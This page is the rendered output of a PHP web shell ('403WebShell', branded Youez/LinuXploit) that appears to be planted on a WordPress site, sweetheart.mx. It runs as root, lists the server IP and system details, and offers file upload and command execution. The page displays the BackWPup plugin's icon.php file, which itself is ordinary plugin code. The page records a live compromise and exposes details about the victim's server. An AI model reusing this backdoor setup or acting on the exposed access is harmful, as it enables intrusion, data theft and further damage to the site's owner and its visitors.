Uname:Linux woropds 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64

Base Dir : /var/www/sweetheart.mx/htdocs

User : root


Who Knows WP Shell uploader
Uname:Linux woropds 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64

403WebShell
403Webshell
Server IP : 216.238.66.20  /  Your IP : 216.73.217.142
Web Server : nginx/1.30.4
System : Linux woropds 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64
User : root ( 0)
PHP Version : 8.2.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/sweetheart.mx/htdocs/wp-content/plugins/backwpup/components/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/sweetheart.mx/htdocs/wp-content/plugins/backwpup/components//icon.php
<?php
use BackWPup\Utils\BackWPupHelpers;

if ( ! defined( 'ABSPATH' ) ) {
    exit;
}

/**
 * @var string  $name   The icon name. Must match a file in components/icons/. Default: "arrow-right".
 * @var string $size The size of the icon. Values: "xs", "small", "medium", "large". Default : "medium".
 * @var string $class Additional classes for the icon. Default: "".
 * @var array  $data  Additional data attributes for the icon. Default: [].
 */

# Icon
$icon = $name ?? 'arrow-right';

# Sizes
$sizes = [
  "xs" => 12,
  "small" => 16,
  "medium" => 21,
  "medium-2x" => 25,
  "large" => 32,
  "xl" => 40,
];
$size_num = isset($size) && array_key_exists($size, $sizes) ? $sizes[$size] : $sizes["medium"];

# Classes
$classes = isset($class) ? $class : '';

# Data attributes
$data_attributes = '';
if (isset($data) && is_array($data)) {
	foreach ($data as $key => $value) {
		$data_attributes .= ' data-' . $key . '="' . esc_attr($value) . '"';
	}
}

if (file_exists(untrailingslashit(BackWPup::get_plugin_data('plugindir'))."/components/icons/" . strtolower( $icon ) . ".php")) { // /var/www/html/wp-content/plugins/backwpup/components/icons/folder.php
  BackWPupHelpers::component("icons/". strtolower( $icon ), [
    'size' => $size_num,
	'class' => $classes,
	'data' => $data_attributes,
  ]);
} else if (file_exists(untrailingslashit(BackWPup::get_plugin_data('plugindir'))."/assets/img/storage/" . $icon . ".svg")) {
  include untrailingslashit(BackWPup::get_plugin_data('plugindir'))."/assets/img/storage/" . $icon . ".svg";
} else {
  return;
}



Youez - 2016 - github.com/yon3zu
LinuXploit